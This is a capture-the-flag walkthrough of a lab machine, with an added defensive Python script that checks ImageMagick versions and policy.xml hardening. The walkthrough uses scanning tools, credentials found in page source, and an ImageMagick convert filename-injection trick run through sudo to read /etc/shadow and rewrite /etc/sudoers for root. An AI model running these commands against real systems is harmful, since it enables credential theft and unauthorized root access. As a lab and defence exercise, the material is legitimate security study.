• netdiscover
• Nmap
• Wfuzz
• Nikto


ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities

Use netdiscover to find the target's IP address:

netdiscover -i eth0 -r (followed by the network range); the host it reports is the target.

Then run nmap to find open ports and the services running on the target machine:

nmap -sV -v -O -A -T5 -p-

Ports 22 and 80 are open.

Use wfuzz to brute-force directories:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

Nothing interesting comes back.

Check the web page: there is a file davinci.htm. Double-click it.

Not useful.

Check the source code:

This yields a potential username/password pair: margo:god.

Log in over SSH:

We get a shell.

Now let's try to get root:

sudo -l

Try executing the program the rule allows. It turns out to be ImageMagick:

searchsploit ImageMagick

I used that exploit.

convert '"|ls "-la' out.png

Now try:

sudo convert '"|cat "/etc/shadow' out.png

Modify /etc/sudoers:

sudo convert '"|vim "/etc/sudoers' out.png

Save and quit.

SSH back into the box as margo, then:
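From the defender's side, the chain above needs two things: an ImageMagick build inside the range the searchsploit title names, and a sudo rule that lets a low-privilege user run convert as root. The script below is an added exposure check and is not part of the original writeup. It parses the version string that `convert -version` prints and compares it against the ceilings from the title (<= 6.9.3-9 / <= 7.0.1-0), and it audits policy.xml for the coder restrictions ImageMagick published as the ImageTragick mitigation. The version-output line and both policy.xml fragments are constructed samples; the helper names (`parse_version`, `assess`, `collect_from_host`) are hypothetical. The policy audit only shows whether the published coder denials are in place; it does not by itself prove that the filename-pipe form used above is blocked on a given build, so a version inside the affected range and an unrestricted sudo rule for convert are the findings to act on first.

```python
"""Exposure check for the ImageMagick step in the writeup above.

Added helper, not part of the original writeup. It answers two defender
questions: does the installed ImageMagick fall in the range named by the
searchsploit title (<= 6.9.3-9 / <= 7.0.1-0), and does policy.xml carry
the coder restrictions ImageMagick published as the ImageTragick mitigation.
"""
import re
import subprocess
import xml.etree.ElementTree as ET
from pathlib import Path

# Version ceilings taken from the searchsploit title quoted in the writeup.
AFFECTED_CEILINGS = {6: (6, 9, 3, 9), 7: (7, 0, 1, 0)}

# Coders the published policy.xml mitigation sets to rights="none".
REQUIRED_CODER_DENIALS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL",
                          "TEXT", "SHOW", "WIN", "PLT"}

# Constructed sample inputs (not captured from a real host).
SAMPLE_VERSION_OUTPUT = ("Version: ImageMagick 6.9.3-9 Q16 x86_64 "
                         "2016-04-16 http://www.imagemagick.org")
WEAK_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="resource" name="memory" value="256MiB" />
</policymap>"""
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""


def parse_version(text):
    """Extract (major, minor, patch, build) from 'convert -version' output or a bare '6.9.3-9'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)-(\d+)", text)
    if not m:
        raise ValueError("no ImageMagick version string found")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when the version is at or below the ceiling for its major release."""
    ceiling = AFFECTED_CEILINGS.get(version[0])
    return ceiling is not None and version <= ceiling


def _denials(policy_xml, domain):
    """Set of patterns a policy.xml assigns rights="none" within one domain."""
    root = ET.fromstring(policy_xml)
    return {p.get("pattern", "").upper() for p in root.iter("policy")
            if p.get("domain", "").lower() == domain
            and p.get("rights", "").lower() == "none"}


def missing_coder_denials(policy_xml):
    """Coders the published mitigation denies that this policy still allows."""
    return sorted(REQUIRED_CODER_DENIALS - _denials(policy_xml, "coder"))


def indirect_reads_blocked(policy_xml):
    """The '@file' filename form reads a list of names from a file; the mitigation denies it."""
    return "@*" in _denials(policy_xml, "path")


def assess(version_text, policy_xml):
    """Combine both checks into one report dictionary."""
    version = parse_version(version_text)
    return {
        "version": version,
        "affected_version": is_affected(version),
        "missing_coder_denials": missing_coder_denials(policy_xml),
        "indirect_reads_blocked": indirect_reads_blocked(policy_xml),
    }


def collect_from_host():
    """Read live values; fall back to the constructed samples when ImageMagick is absent."""
    try:
        version_text = subprocess.run(["convert", "-version"], capture_output=True,
                                      text=True, check=False).stdout
    except FileNotFoundError:
        version_text = SAMPLE_VERSION_OUTPUT
    policy_xml = WEAK_POLICY
    # Debian/Ubuntu install locations for the ImageMagick 6 and 7 policy files.
    for candidate in ("/etc/ImageMagick-6/policy.xml", "/etc/ImageMagick/policy.xml"):
        path = Path(candidate)
        if path.is_file():
            policy_xml = path.read_text()
            break
    return version_text, policy_xml


if __name__ == "__main__":
    for key, value in assess(*collect_from_host()).items():
        print(f"{key}: {value}")
```

Run it on the box as any user; a report showing `affected_version: True` together with a non-empty `missing_coder_denials` list describes exactly the state the writeup exploits, and the fix is to upgrade past the affected range and deploy the hardened policy rather than to leave convert reachable through sudo.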

sudo su

Game Over